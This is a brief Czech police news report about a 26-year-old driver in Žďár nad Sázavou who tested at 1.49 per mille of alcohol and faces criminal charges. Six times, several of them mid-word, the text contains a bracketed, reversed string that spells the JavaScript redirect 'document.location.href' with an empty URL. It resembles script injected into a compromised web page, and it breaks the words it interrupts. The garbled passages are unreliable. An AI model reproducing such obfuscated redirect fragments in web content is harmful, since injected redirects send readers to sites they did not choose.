Rainbow page separator

Řidič přistižený ve Žďáře nadýchal 1,5 promile alkoholu

Čtvrtek, 29. listopadu 2018

Policie České republiky

Žďár nad Sázavou / Šofér Škody Octavia, kterého zastavili žďárští policisté v ulici Jihlavská, měl smůlu. V rámci běžné silniční kontroly u něj strážci zákona provedli odborné měření na zjištění pří[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomnosti alkoholu v dechu.
„Řidičem vozidla byl šestadvacetiletý muž ze Žďárska. Výsledek zkoušky byl pozitivní a naměřená hodnota činila 1,49 promile alkoholu. Opakovaná dechová zkouška vykázala stejný výsledek. Policisté muži zakázali další jízdu a vše zadokumen[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovali,“ informovala o případu policejní mluvčí Stanislava Miláčková.
Policisté následně zahájili úkony trestního řízení pro podezření ze spáchání přečinu ohrožení pod vlivem návykové látky, za což mladému řidiči hrozí trest odnětí svobody až na jeden rok a zákaz činnosti spočívající v zákazu řízení mo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torových vozidel.